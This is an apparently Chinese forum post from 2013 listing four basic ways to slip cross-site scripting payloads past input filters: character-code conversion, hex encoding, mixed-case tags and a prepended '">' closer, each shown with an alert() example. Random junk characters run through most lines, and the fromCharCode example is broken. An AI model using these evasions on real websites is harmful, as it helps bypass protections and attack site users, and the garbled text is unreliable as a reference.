四种超级基础的绕过方法。
3 f% E/ m2 R( y1.转换为ASCII码
2 d- C. \3 ]9 s/ t例子:原脚本为<script>alert(‘I love F4ck’)</script >
9 m" ]: n- x9 |4 J [* k) y$ ?通过转换,变成:- ^' B! Q3 d8 W
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
" D' T: u! m/ ]! E! @8 h/ _, K / \$ B' a* D6 t# p- z! l
2.转换为HEX(十六进制)
5 e/ R) `. N2 P/ t, v例子:原脚本为<script>alert(‘I love F4ck’)</script>
. N$ H0 ?, J" u' i3 J, l0 \( F, L通过转换,变成:
+ m3 c. l& _ p, `' T5 i$ f) \%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e1 P2 g- ?* n% e1 B' O
8 B2 S/ u" G1 \5 o4 h$ Q3.转换脚本的大小写% h! Z- W$ A2 \3 p3 Q" T
例子:原脚本为<script>alert(‘I love F4ck’)</script>
. q$ p" C, ?. x' G5 o转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
?8 |$ f; O6 Q e
7 u+ `& r# a5 U* B6 K" e8 q4.增加闭合标记”>. Z3 G7 Z+ D' @1 w# S1 V
例子:原脚本为<script>alert(‘I love F4ck’)</script>( l I1 a% K: ?* {% V! |
转换为:”><script>alert(‘I love F4ck’)</script>
6 p! I" l! P3 j% F. Z6 V' g. b: [更详细绕过技术请参考此网页6 j3 S4 j: m; x1 D: s' R8 M* i" s
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet# k5 d: N9 V! k8 C+ y. |
4 M7 ~4 }. e( ^, c; p, h0 F" E# Y转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对